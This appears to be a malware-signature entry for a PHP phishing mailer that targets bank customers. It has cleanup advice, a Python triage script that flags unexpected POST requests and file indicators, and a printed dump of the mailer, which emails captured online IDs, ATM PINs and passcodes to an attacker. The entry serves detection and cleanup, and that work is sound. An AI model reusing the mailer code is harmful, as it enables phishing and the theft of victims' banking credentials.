Malware Signatures


php.phishing.hitman.001

Phishing is a way to illegally acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication (web site, email, etc.). The fake websites are hosted on compromised sites without the owner's permission, and links to them are sent to the victims by mailing scripts, which may or may not be hosted on the same server as the phishing page.
Phishing pages are often complex and rely on several files to run. They are usually hosted in a specific directory whose name resembles the phishing target.
PHP phishing tools are malware accomplices: they are mostly used to send the captured credentials to the attacker and to perform the last actions, such as redirecting the victim to the legitimate page or even closing the browser window.
Created by a hacker using the handle Mr.HiTman, this tool was found on several phishing sites that were targeting banks. It collects the personal information captured by the phishing pages (in the dump below: account state, online ID, ATM or check card PIN and passcode, plus the victim's IP address) and sends it by e-mail to an address controlled by the attacker.

Affecting

Any website running vulnerable software or hosted on a server with compromised access credentials

Cleanup

Inspect your site's files and directories for strange names, or names that resemble other sites than yours (for example a bank's), and delete them.
Reviewing your site's access logs for unusual POST requests, especially POSTs to PHP files in directories you did not create, is a good way to find out whether your site is infected and where the malicious code is being hosted.
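The two cleanup steps above (look for directories that imitate another site, and look for unexpected POST requests in the access log) and the file-level indicators visible in the dump below can be turned into a small triage script. The following is an added example written for this page; it is not Sucuri's scanner nor any part of the phishing kit. The log lines, the directory name `BoA-Secure-Login`, the file name `hitman.php`, the allow-list of legitimate POST targets (a WordPress layout is assumed) and the list of brand-like words are all constructed for the demonstration.

```python
"""Triage helpers for locating a PHP phishing mailer on a compromised site.

Added example for this page, not Sucuri's code and not the kit's code.
Assumptions: Apache/nginx combined log format, a WordPress site whose only
legitimate POST targets are the ones in KNOWN_POST_TARGETS, and a constructed
BRAND_WORDS list of fragments commonly seen in bank-themed directory names.
"""
import re
from collections import Counter

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed allow-list: the only scripts a clean WordPress install should receive POSTs on.
KNOWN_POST_TARGETS = {"/wp-login.php", "/wp-comments-post.php", "/wp-admin/admin-ajax.php"}

# Assumed list of fragments that show up in directory names imitating a bank or a login page.
BRAND_WORDS = ("bank", "boa", "login", "secure", "verify", "update", "account")

# Indicators taken from the dump on this page (author tag, mail subject, captured POST fields).
FILE_INDICATORS = [
    re.compile(r"Mr\.?HiTman", re.I),
    re.compile(r"BOA RESULTAT"),
    re.compile(r"\$_POST\['(onlineid|passcode|atmcheckcardpin|accountstate)'\]"),
]
# Generic shape of any such mailer: reads $_POST[...] and calls mail(...).
MAIL_RE = re.compile(r"\bmail\s*\(", re.I)
POST_RE = re.compile(r"\$_POST\[")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_posts(lines):
    """Map each POST target that is a .php file outside the allow-list to its hit count."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if path in KNOWN_POST_TARGETS or not path.lower().endswith(".php"):
            continue
        hits[path] += 1
    return dict(hits)


def brand_like_dirs(paths):
    """Directory names in the given request paths that resemble a bank/login target."""
    found = set()
    for p in paths:
        for seg in p.strip("/").split("/")[:-1]:  # drop the file name, keep directories
            if any(w in seg.lower() for w in BRAND_WORDS):
                found.add(seg)
    return found


def scan_php_source(src):
    """List the indicators present in a PHP file's text; 'mail+post' is the generic mailer shape."""
    found = [rx.pattern for rx in FILE_INDICATORS if rx.search(src)]
    if MAIL_RE.search(src) and POST_RE.search(src):
        found.append("mail+post")
    return found


# Constructed access-log excerpt: two legitimate POSTs and two to a planted mailer.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0
198.51.100.23 - - [10/Oct/2023:14:02:11 +0000] "GET /images/BoA-Secure-Login/index.html HTTP/1.1" 200 8871
198.51.100.23 - - [10/Oct/2023:14:02:58 +0000] "POST /images/BoA-Secure-Login/hitman.php HTTP/1.1" 302 0
198.51.100.41 - - [10/Oct/2023:14:05:13 +0000] "POST /images/BoA-Secure-Login/hitman.php HTTP/1.1" 302 0
198.51.100.9 - - [10/Oct/2023:14:06:00 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0
"""

# Constructed file content with the same shape as the dump on this page.
SAMPLE_PHP = r"""<?php
$message .= "Online ID: ".$_POST['onlineid']."\n";
$message .= "---------------Created BY Mr.HiTman---------\n";
mail($amon,$subject,$message,$headers);
"""

if __name__ == "__main__":
    posts = suspicious_posts(SAMPLE_LOG.splitlines())
    print("unexpected POST targets:", posts)
    print("brand-like directories:", brand_like_dirs(posts))
    print("file indicators:", scan_php_source(SAMPLE_PHP))
```

Run it against a real log with `suspicious_posts(open("access.log"))` and against each PHP file under the web root with `scan_php_source(path.read_text(errors="ignore"))`. The allow-list is the part that needs tuning per site; a POST to a `.php` file you cannot account for, in a directory you did not create, is the signal this page's cleanup section describes.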

Dump


<?php
$ip = getenv("REMOTE_ADDR");
$message .= "-----------------------Account Info------------------------------------
";
$message .= "Account Open In: ".$_POST['accountstate']."
";
$message .= "Online ID: ".$_POST['onlineid']."
";
$message .= "ATM or Check Card PIN: ".$_POST['atmcheckcardpin']."
";
$message .= "Passcode: ".$_POST['passcode']."
";
$messege .= "host";
$message .= "---------------Created BY Mr.HiTman------------------------------
";
$amon = "[email protected]";

$subject = "BOA RESULTAT $ip";$headers = "From: HiTman<[email protected]>";$headers .= $_POST['eMailAdd']."
";$headers .= "MIME-Version: 1.0
";$arr=array($amon, $IP);foreach ($arr as $amon);

mail($amon,$subject,$message,$headers);